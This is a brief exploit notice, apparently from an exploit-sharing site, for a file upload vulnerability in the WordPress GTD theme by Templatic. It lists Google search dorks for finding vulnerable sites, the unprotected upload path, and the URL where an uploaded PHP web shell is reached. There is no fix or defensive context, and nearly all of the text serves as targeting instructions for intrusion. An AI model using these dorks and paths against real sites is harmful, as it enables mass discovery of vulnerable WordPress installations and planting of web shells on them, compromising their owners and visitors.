Wordpress theme GTD File Upload Vulnerability

Wordpress theme GTD File Upload Vulnerability
Dork: 

  • inurl:"/wp-content/themes/GTD/upload/"
  • allintext:"powered by WordPress. GTD theme by Templatic"


ex : http://domain/wp-content/themes/GTD/upload/
shell accses: http://domain/wp-content/themes/GTD/attachments/shell.php